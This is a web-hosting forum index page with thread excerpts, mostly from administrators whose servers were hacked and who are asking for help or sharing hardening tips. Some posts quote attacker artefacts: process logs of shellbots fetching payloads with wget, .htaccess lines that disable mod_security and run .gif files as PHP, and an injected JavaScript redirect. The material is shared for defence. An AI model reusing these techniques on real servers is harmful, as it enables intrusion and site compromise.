Autoban Hackers Searching For Phpmyadmin
			Aug 7, 2008
				I've seen perl scripts able to achieve this, so I am wondering if a tool similar to this has been released to work with APF / Iptables?
The script in question is a "bot trap" and you put a deny rule in robots.txt to a hidden file.
In that file, the script records the offending IP and blocks it in htaccess (once the file in question is hit by a bot/person).
Getting a bit tired of seeing these morons always searching for:
/phpmyadmin
/pma
etc, etc.
	
	View 7 Replies
  
    
	ADVERTISEMENT
    	
    	
        Feb 3, 2008
        I'd like to buy a server from OVH, but my contry is not in available list.
I was wondering if there is anyone on this board who can buy and resell it to me.
I already tried fservers.net but they are not accepting new orders.
	View 14 Replies
    View Related
  
    
	
    	
    	
        Mar 29, 2008
        I want to have a cronjob that would search /home every 2 hours for a certain folder name then it will save the path on a text file and notify me if found. Anyone can help me what to put on the .php file and include that on cronjob?
	View 7 Replies
    View Related
  
    
	
    	
    	
        Aug 15, 2007
        I'm currently a customer of The Planet and have been now for about 3-4 years, I've been very pleased with their service and their hardware. However I'm getting to the point where I'd like to upgrade my server and their upgrade prices as like most any other datacenter are 100-200% more then retail. While I'm not against people making money, this to me seems a bit to much.
So I'm considering paying a bunch of money up front to buy a new Dell 1950 PowerEdge server, and in doing so I need to find a company that can colo the new server. However I know a little about dedicated servers but nothing about colo or where to even start. I've found a few companies here in Lexington, KY as well as Louisville, KY and a few other companies in surrounding areas but I don't know the slightest thing I should be asking about. When searching for a dedicated machine it was easy - bandwidth and system specs.
What are a good list of questions I should be asking these companies when I call them for prices and availability?
	View 14 Replies
    View Related
  
    
	
    	
    	
        Apr 12, 2008
        When I look around almost all offers are webhosting as
Dedicated or Managed servers with PHP, MxySQL and so on.
What I need is (big) pure backup space which must be at least
accessible by (reliable and pretty fast but not absolute ultar-high-speed) ftp server (which supports resuming of ftp-sessions).
Needed space: 200 GB
Traffic per month: 200-500 GB (can be at night)
(only) Nice to have (but not absolutely required):
- TLS/SSL Encryption for ftp
- 2-5 more ftp accounts (sharing the same space)
- crontab and perl scripts
- WebDav
	View 1 Replies
    View Related
  
    
	
    	
    	
        Sep 15, 2008
        I want a reliable network. I would prefer having a dedicated 10mbit rather then 100mbps shared. 
Server requirements:
Reliable fast network.
2Gigs of Ram
WHM
I will be hosting online games on the server so the latency is very important. Server can be either in UK or USA.
Budget: 140USD per month. Not interested in servers with setup fees.
	View 12 Replies
    View Related
  
    
	
    	
    	
        Oct 13, 2007
        This question is about a shared hosting server running Cpanel on CentOS. A script on the server is sending out SYN flood targeted to an external third-party website. While running netstat, I can see that the main IP of the server is making a lots of SYN connections to the external site.
How can I find out which script on server in initiating those SYN connections? 
	View 10 Replies
    View Related
  
    
	
    	
    	
        Sep 7, 2007
        I'm searching a server monitoring software which can call a phone of a technician. Either by isdn or with gnokii mobilephone.
The software should tell then on the phone which server is down or which service is down.
Is something like this already existing?
	View 9 Replies
    View Related
  
    
	
    	
    	
        Jun 26, 2014
        This is applies to both Horde and roundcube webmail client software;
Using Plesk 11.5.30 with Horde 5.1.5 or roundcube 0.9.5 on CentOS Linux release 6.5 (Final).
We have seen this behavior occur on multiple servers.
Clients experienced slow to no response after executing a search, which eventually results in a failed to communicate with the server-error in the webmail client.
The Apache server log shows script time-out errors when searching larger mailboxes (i.e. larger than 950 MB), this does not happen on smaller mailboxes.
We have seen errors like the following in the Apache server error log with Horde (personal data like IP-address and domain name are x'ed out):
[Thu Jun 19 14:55:06 2014] [warn] [client xx.xxx.xxx.xxx] mod_fcgid: read data timeout in 45 seconds, referer: http://webmail.xxxxxxx.com/imp/dynamic.php?page=mailbox
[Thu Jun 19 14:55:06 2014] [error] [client xx.xxx.xxx.xxx] Premature end of script headers: ajax.php, referer: http://webmail.xxxxxxx.com/imp/dynamic.php?page=mailbox
And with Roundcube:
[Tue Jun 17 13:02:04 2014] [warn] [client xx.xxx.xxx.xxx] mod_fcgid: read data timeout in 45 seconds, referer: https://webmail.xxxxxxxxxxx.com/?_t...d=19445&_mbox=INBOX&_caps=pdf=0,flash=1,tif=0
[Tue Jun 17 13:02:04 2014] [error] [client xx.xxx.xxx.xxx] Premature end of script headers: index.php, referer: https://webmail.xxxxxxxxxxx.com/?_t...d=19445&_mbox=INBOX&_caps=pdf=0,flash=1,tif=0
Steps to reproduce:
- use a large mailbox (950 MB or higher)
- login to the webmail (Horde or roundcube)
- do a search in the search field on the top right
- the time-out error should appear in the server Apache error log (after at least 45 seconds)
This seems like an inefficiency or bug in the search query that searches the user's mailbox. Is there any other way we can prevent this issue and the error messages?
	View 4 Replies
    View Related
  
    
	
    	
    	
        Jan 21, 2007
        Hackers these days don't hack for money, alot of times they hack for pride and the lame fun in it.
Look at this website,
[url]
	View 14 Replies
    View Related
  
    
	
    	
    	
        Dec 27, 2007
        I am constantly battling hackers over the last week and I have to admit I'm not really sure what it is that is letting them in, but they're getting in... the processes all run as "apache" so clearly it's the webserver somehow.
I've changed the ssh port, have disabled cron on the apache user and have set php safe_mode on the site I think might be to blame, but still no luck.
Logged in this morning to be greeted by this...
Quote:
[root@s15247463 httpdocs]# ps -fe | grep apache
apache    2889  2220  1 Dec26 ?        00:18:36 /usr/sbin/httpd
apache    2891  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
apache    2892  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache    2893  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache    2894  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
apache    2895  2220  0 Dec26 ?        00:00:05 /usr/sbin/httpd
apache    2896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   14664  2220  0 Dec26 ?        00:00:03 /usr/sbin/httpd
apache   32714     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
apache   32719     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
apache   19751  2894  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   19764     1 23 Dec26 ?        03:31:35 shellbot      
apache   28642  2220  0 Dec26 ?        00:00:04 /usr/sbin/httpd
apache   28662  2891  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   28666     1 22 Dec26 ?        03:23:10 shellbot      
apache   29532  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache   29933  2220  0 Dec26 ?        00:07:18 /usr/sbin/httpd
apache   20833  2893  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20838     1 13 Dec26 ?        01:21:35 [httpds]   
apache   20847 29532  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20853     1 13 Dec26 ?        01:21:33 [httpds]   
apache   20870  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   20879  2892  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20884     1 13 Dec26 ?        01:21:28 [httpds]   
apache   20887  2896  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   20892     1 13 Dec26 ?        01:21:16 [httpds]   
apache   20895  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache   20896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   20901  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
apache   21445  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
apache    1875     1  0 00:01 ?        00:00:00 [httpds]   
apache    2237     1  0 00:14 ?        00:00:00 ./mocks start
apache    5465 20895  0 00:23 ?        00:00:00 [sh] <defunct>
apache    5477     1  6 00:23 ?        00:24:48 shellbot      
apache   10110 14664  0 01:00 ?        00:00:00 [sh] <defunct>
apache   10142     1 11 01:00 ?        00:44:09 shellbot      
apache   10537  2220  0 01:27 ?        00:00:01 /usr/sbin/httpd
apache   13780     1  0 02:28 ?        00:00:00 [httpds]   
apache   13781 13780  0 02:28 ?        00:00:00 sh -c wget [url]
-O [url]
apache   13784     1  0 02:28 ?        00:00:00 [httpds]   
apache   13785 13784  0 02:28 ?        00:00:00 sh -c wget[url]
 -O [url]
apache   13788     1  0 02:28 ?        00:00:00 [httpds]   
apache   13789 13788  0 02:28 ?        00:00:00 sh -c wget [url]
-O [url]
apache   13792     1  0 02:28 ?        00:00:00 [httpds]   
apache   13793 13792  0 02:28 ?        00:00:00 sh -c wget [url]
-O [url]
apache   13798 13789  0 02:29 ?        00:00:00 perl test.txt
apache   13802 13781  0 02:29 ?        00:00:00 perl test.txt
apache   13806 13793  0 02:29 ?        00:00:00 perl test.txt
apache   13810 13785  0 02:29 ?        00:00:00 perl test.txt
apache   22282  2220  0 03:40 ?        00:00:00 /usr/sbin/httpd
apache   22434 20896  0 03:51 ?        00:00:00 [sh] <defunct>
apache   22442     1 10 03:51 ?        00:20:33 [httpd]
apache   22513 21445  0 03:55 ?        00:00:00 [perl] <defunct>
apache   22515     1  0 03:55 ?        00:00:00 /usr/local/apache/bin/nscan -DSSL
apache   22552  2220  0 03:58 ?        00:00:00 /usr/sbin/httpd
apache   23183     1  0 04:03 ?        00:00:48 /usr/local/apache/bin/nscan -DSSL
apache   23187     1  0 04:03 ?        00:00:47 /usr/local/apache/bin/nscan -DSSL
apache    3606  2220  0 04:52 ?        00:00:00 /usr/sbin/httpd
apache   27716     1  0 06:54 ?        00:00:00 [httpd]
apache   27720     1  0 06:54 ?        00:00:00 ./php
apache   28140     1  0 07:06 ?        00:00:00 /bin/sh ./mass 139
apache   28299 28140  0 07:12 ?        00:00:00 /bin/bash ./a 139.1
apache   28302 28299  9 07:12 ?        00:00:20 /bin/bash  139.1 22
	View 14 Replies
    View Related
  
    
	
    	
    	
        Mar 12, 2007
        We are rookies and we are being attacked by hackers for the second time in as many weeks.  I can see them in shell right now on multiple servers. I can not remember in all the excitement how to take away their root access. How do I stop them from doing any more damage?
	View 6 Replies
    View Related
  
    
	
    	
    	
        May 18, 2007
        this is the site whose banners appeared on my kids site after hacking, 
	View 0 Replies
    View Related
  
    
	
    	
    	
        May 1, 2009
        Twice in about a week mabey 2 weeks my server provider has sent me spoof abuse messages  on accounts on my server.  These phising pages  first linked to a bank then paypal,  these phising pages  that were placed  were on 2 diffrent accounts and the accounts belong to people ive known for a very long time and they wouldnt have any idea how to do this   so i know  its a hacker getting in somhow.
How can I stop this from happening? Any  programs that I can run on the server?  
Heck even which log files do I check to see where these attacks are coming from would help  as I could block the IP's .    
I'm running cpanel as well if that helps, i use  CSF  . 
I dont want to have to move servers  as that would take a very long time for me.
	View 14 Replies
    View Related
  
    
	
    	
    	
        May 7, 2009
        My PR4 site has been hacked by chinese hackers.
They fortunately did not do anything exceptionally terrible, but the site was down, they altered the serps results and now my inbox ( operating from Squirelmail ) is now receiving even more spam than before.
A network expert suggested that my server would now be being used for sending spam. 
And my company, who will remain nameless atm seem to claim that no server is safe from hackers under any circumstances.
I would like to copy to you the companies response to my questions and I would hope for a word or two of inspiration and encouragement from you?
The second string in each question is the server companies response.
1.Please quote me for checking to see if the server is being used for spam and blocking this from happening.
We could certainly check and see if you server is currently sending out any spam and try to identify where it is originating from.  Depending on the issue a fix may be required by your developers
2.Running a check on the sites code to see if there has been any amendments to the coding on the site 
We can check and see if there has been any FTP access and look at file modification dates, this would hopefully pick up and issues.
3.Making sure the server is safe and that all China ip ranges are banned.
Whilst we cannot ban all Chinese ranges as we do not know all ranges China uses we can lock FTP and SSH access to certain ranges only, you would need to provide these ranges.
4.Applying a second level of security to stop a spammer from hacking the system ( However I am sure I already have anti virus and spy ware on the server )
I’m not sure you do have any anti-virus/spyware on your server, it is certainly not something we install.  I don’t really believe either of those tools would stop someone hacking the server either, Linux server don’t really get affected by that.  We could run a rootkit checker which checks for backdoors and modification of the operating system files.  We would also suggest making sure the scripts are secure and any web interface (admin area) logins have secure passwords and are also IP restricted.
For the work above we would charge 1 hour support at £150 per hour ex vat.
	View 10 Replies
    View Related
  
    
	
    	
    	
        Feb 21, 2007
        I am giving few tips on securing your server against hack attempts. You must check these inspite of other securities like firewall, rootkits detectors etc.
1. Most Important, do not disable safe_mode under php.ini. If any customer asks to disable it, turn it off on his account only, not on whole server.
As most of the time attack is done using shellc99 (phpshell) script. In case safe_mode is off on server and there are public dirs with 777 permission, he can easily hack through.
2. Compile apache with safe mode as well.
3. In cpanel under tweek settings, turn on base_dir, if someone requests to turn off, turn it off on his/her account only. As using phpshell one can easily move to main server dirs like /etc, /home.
4.  Do not allow Anonymous Ftp on your server. You can turn it off from ftp config under WHM Service Configuration. If its allowed, one can easily bind port using nc tool with your server and gain root access. Always keep it disabled.
5. Make sure /tmp is secured. You can easily do that by running this command /scripts/securetmp using ssh. But do make sure, /tmp is secured. Else one can upload some kind of perl script in /tmp dir and can deface or damage all data on the few/all accounts on your server.
keeping your server secure from hack attempts.
	View 7 Replies
    View Related
  
    
	
    	
    	
        May 23, 2007
        What would you think about creating a big text file with IPs of known hackers, bots and similar "bad" creatures to keep out from our servers? Do you think it's worth it?
You can post lists of IPs if you want...
	View 7 Replies
    View Related
  
    
	
    	
    	
        Sep 27, 2007
        I've been on yet-another crusade this morning..and have a few questions for the..umm.."general" hosting audience.
We live in odd times. If you told me that script kiddies might be able to completely comprimise a server via php..or that spammers are now using the webserver *itself* to send spam a few years ago..I would have laughed. This is no laughing matter.
A concept of privacy comes into play..and I'm curious how many of you handle it. Joe pays me for a account..agrees to my TOS/AUP..and starts uploading files. The way I see it..we have many ways of dealing with scripts that do bad things. It seems to me, though...this may be considered "spying" on our customers.
If we have a script..say..that runs every fifteen minutes..and looks for these scripts..wouldn't that be considered spying?
Or would this be something we should just bury in our aup/tos that this might happen? I have read and agreed to quite a few of those AUP/TOS things..and I can't remember even one time even a mention that files that I upload to the server may be scanned or inspected..before allowing the file to be placved on the server.
Never..not once. 
However...this may have changed. If you've ever tried to get even a simple Perl script to work on a Cpanel server...you probably understand that many safeguards are there for the sake of everybody else on the server...and may prevent you from doing what you want to do with the script(s).
At the same time..though..it seems to fly in the face of common sense that many script packages available today are inherently insecure. Chmod 777 files and directories? Even in the times we live in today and know this is a very, very bad idea?
Yet..there seem to be even more like this today than ever before.
>>I mention this from first hand expereince. One of the many magazines I get had a article detailing the trials the author was having trying to get Simple Groupware working on a vps.
yesterday..I noticed a post with a person wanting something installed on a production server. Not only was the program a beta..but..just like Simple Groupware..looked horribly insecure.
In retrospect...I can remember the very first php script I ever used. The year was 1996..and this was my first Cpanel shared account. I even remember having to add *.php to the mime types.
It installed without a hitch..and..coming from the Perl world I had spent many years in..and many hours getting those scripts to work..it seemed almost like a miracle.
It seems, as hosts, there are a few ways we can go at this.
1) Modify the ftp server so it inspects files
2) Have a program that looks for things..much like rkhunter does.
3) A front-end for all scripts..perhaps MySQL as well..that enforces rulesets..for restricted content..or resource allocations.
	View 1 Replies
    View Related
  
    
	
    	
    	
        Jan 16, 2007
        One of my servers which hosts 200 domains is being attacked by hacker(s).  It seems any world writeable files are being replaced or modified by the linux account nobody.  How can I secure this account?  Is it safe to change the password?  I know many processes depend on using the nobody account to run. 
	View 1 Replies
    View Related
  
    
	
    	
    	
        Jun 25, 2007
        guys im tired off fighting those hackers everyday! i have about 20 websites,and everyday i have one of them hacked! i restore a backup then another one hacked!
 
thats unbelivable!!!
those bastards upload there shell scripts to websites via bugs or whatever from php files!!
 
is there anyway to stop these commands?
can .htaccess helps? how?
 
i talked to my webhosting companies for my websites! ....
	View 10 Replies
    View Related
  
    
	
    	
    	
        Nov 7, 2009
        two of my website on the server was changed by the hackers.How did they do it?
	View 7 Replies
    View Related
  
    
	
    	
    	
        Mar 27, 2009
        For you, what a webmaster must do to prevent get hacked?
	View 14 Replies
    View Related
  
    
	
    	
    	
        Aug 7, 2008
        how to secure my website from hackers, or anything like that. I host my own website, from a home server and I was wondering what I can do to protect me and my website.
	View 5 Replies
    View Related
  
    
	
    	
    	
        Jan 18, 2008
        My site is going down lot of times due to high cpu quota and when i check cpu exceeded logs i could see some ip addresses trying to open non existenet permalinks i.e. my site is smartdesis.com and they try to open smartdesis.com/xxx which gives a 404 error which is causinf high cpu usage. Repetedly they are trying to open differnt urls by appending /xxx to them, i banned nearly 100 ips but they seem to be growing.
	View 10 Replies
    View Related
  
    
	
    	
    	
        Aug 3, 2008
        Am suffering from a hacker every time, he changes my client’s index (index..Php).
 
I changed FTP log, but still, it seems doesn’t work!
My simple question: How to protect the index page from hackers?
	View 4 Replies
    View Related
  
    
	
    	
    	
        Feb 3, 2008
        i have a problem with a hacker that uses .htaccess to disable mod_security
using this code
PHP Code:
<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule> 
so is there a way to stop this?
also they have come up with a smart way to run shell files named as images using this code in .htaccess
PHP Code:
AddType application/x-httpd-php .gif 
is there a way to disable the "AddType application"?
	View 14 Replies
    View Related
  
    
	
    	
    	
        Jul 12, 2008
        I've been concerned about executing commands through (./) using php and perl shells on the server 
a new way of hacking these days is using perl shells , even if the perl was terminated on the server ,, or was forbidden for users
hackers upload a (perl) program to the server to use it instead of the server's own perl
any way ,,
chmoding the (ls-cat-more-less) to 4750 seems to give permission denied when exeuting these programs on the server
but the hackers also found that they could upload their own ls-cat-more-less programs and use them instead of the server's
they also could rename them ls==>ki or anything and use them like this
./ki /etc/valiases -alXrt 
and the commands work like charm for them
./ <<--- this command uses the sh program on the server ,, ((sh which refers to bash on most servers))
so
./ki 
is the same as
sh ki
and
bash ki
so i tried chmoding sh with 4750 and that killed the exploit
i was concerned about cpanel's and the website's functionality 
so i tried changing an accounts password and creating a database ,, they both worked fine
so ,, if u thing chmoding 4750 sh   is a bad idea please let me know
and if you know any other ways of disabling all the perl scripts on the server
	View 14 Replies
    View Related
  
    
	
    	
    	
        Dec 19, 2008
        ThePlanet.com permitting hackers or just incompetent?
It sort of seems that way.  I noticed my former boss's site was redirecting to the searchportal.information.com linkfarm junk site.  I knew this was not his site and took a closer look at the link that I saw when I visited his site.  I use NoScript in firefox and saw this as as a link on his primary page that the script was trying to make me go to.  [url]
This script then redirects me to this junk site.  
[url]...BDlaBQlSAFADDw
I would not recommend going there unless you have Firefox  installed with NoScript installed along with Adblock Plus. Who knows what exactly this site may be trying to do.  Anyway, I noticed this was happening and took a look at the source of my boss's site as it is now and this is what I get:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<BODY>
<script type="text/javascript">
<!--
window.location = [url]
//-->
</script>
</BODY>
</HTML>
So Java Script is being executed which executes that code located on on ThePlanet.com's service.  Using the IP address that is hosting the script, I did a DNS check and come up with this: [url]
Quote:
OrgName:    ThePlanet.com Internet Services, Inc. 
OrgID:      TPCM
Address:    315 Capitol
Address:    Suite 205
City:       Houston
StateProv:  TX
PostalCode: 77002
Country:    US
ReferralServer: rwhois://rwhois.theplanet.com:4321
NetRange:   216.40.192.0 - 216.40.255.255 
CIDR:       216.40.192.0/18 
OriginAS:   AS13749,  AS13884,  AS21844,  AS30315
OriginAS:   AS36420
NetName:    NETBLK-THEPLANET-BLK-EV1-5
NetHandle:  NET-216-40-192-0-1
Parent:     NET-216-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.EV1SERVERS.NET
NameServer: NS2.EV1SERVERS.NET
Comment:    ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:    2000-10-05
Updated:    2008-02-28
OrgAbuseHandle: ABUSE271-ARIN
OrgAbuseName:   The Planet Abuse 
OrgAbusePhone:  +1-281-714-3560
OrgAbuseEmail:  abuse@theplanet.com
OrgNOCHandle: THEPL-ARIN
OrgNOCName:   The Planet NOC 
OrgNOCPhone:  +1-281-714-3555
OrgNOCEmail:  noc@theplanet.com
OrgTechHandle: TECHN33-ARIN
OrgTechName:   Technical Support 
OrgTechPhone:  +1-214-782-7800
OrgTechEmail:  admins@theplanet.com
# ARIN WHOIS database, last updated 2008-12-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
So I sent ThePlanet.com an email to Abuse@theplanet.com two days ago which is what their tech support phone number told me.  This is the email I sent two days ago minus any information that would embarrass my former boss.
Quote:
Hi,
>
> I was taking a look at my former employers website to see if they had done
> anything new with it and I saw this happen today. The domain is
> website.  I would not recommend you going to the site unless you
> are using Firefox for a browser and have the NoScript plugin installed.  A
> perl script tries to automatically redirect with the domain of
> [url].  This script automatically forwards to
> [url]
> .
>
> I think all that applies to you is that whoever owns the server or account
> with IP 216.40.254.78 has been most likely compromised. A support
> representative from your company said I must email you regarding this.  I
> got the contact information from the IP address within the script by looking
> it up here: [url].  I also
> notice that the entire IP address is compromised.
> I have notified the owner of website as they use a different
> host (Godaddy) and will need to have their hosting account cleaned up.  I suppose it is also possible that someone is using your service for nefarious activities.
>
> If you have any further questions, please feel free to reply.
>
> Regards,
> Lee
This is the email I got just a few minutes from ThePlanet.com.
Quote:
On Thu, Dec 18, 2008 at 10:03 PM, <abuse@theplanet.com> wrote:
>
> Reference: [ThePlanetAbuse-C30396127D]
>
> Dear Sir or Madam,
>
> We appreciate you bringing this to our attention.  We feel this issue has already been resolved, as we are unable to access the material in question.
>
> --
> Regards,
> Abuse Department
> The Planet
> abuse@theplanet.com
> [url]
Now if you take a look at the above perl script, it is still there and going to that IP still executes that script and redirects you to the link farm.
I replied with this just a few minutes ago.
Quote:
You do understand that when you go to the site of website.com
it redirects to your one of your servers with an IP of 216.40.254.78.
The actual scrip that runs is this one: [url]
This then redirects to a link farm located on [url].  You do know that IP is your IP
and that it is still there?   That IP is one of your according to
this:  [url]One of two things is happening here.
1.  The person who hacked someone else's website (website.com)
either owns the server with the IP address listed above or this person
hacked this server or.
2.  Your server is being used in illegal hacking activity to redirect
visitors of other websites to a site who's only purpose is to make
money through a link farm.
Either one of those above is unacceptable and to say that the material
doesn't exist on your own server when I can see it from here would be
an inaccurate statement.
When viewing the source of website.com domain, this is the source HTML.
This is very much using your server and hosting service to redirect
unsuspecting users to a nefarious website.
	View 8 Replies
    View Related
  
    
	
    	
    	
        Sep 4, 2008
        yesterday andhrahost.com hacked our WHMCS  and sent emails to many of our customer 
here is the screen shoot , 
[url]
[url]
he also deleted all admin logs but luckily.i took this screen shoot
Around 2 month back also this happen with us and we even informed OC3 about it but that time also. Mr Alex Ferrari From OC3 networks replied to me and didn't took any action on it.we daily get spam from oc3 networks ip.
regularly they were trying to hack our whmcs and yesterday they did it 
i have even sent email to OC3 network and this time also ne reply from them and the hacker,spammer server is still up and selling warez hosting , illigal hosting openly.
Kindly guide me how to proceed to take actions against OC3 netwokrs and against that hostig company who is doing this regurarely.
	View 14 Replies
    View Related
  
    
	
    	
    	
        May 7, 2007
        Does the use of partitions prevent hackers from getting access to the entire Unix server?
	View 2 Replies
    View Related
  
    
	
    	
    	
        Dec 3, 2008
        i downloaded a copy of phpmyadmin and uploaded it to my hosting.. then i run mydomain.com/phpmyadmin/setup configured the server to my hosting IP address but it says i can't login using myusername@localhost do i need to do something on a cpanel mysql server to listen to the external phpmyadmin?
	View 1 Replies
    View Related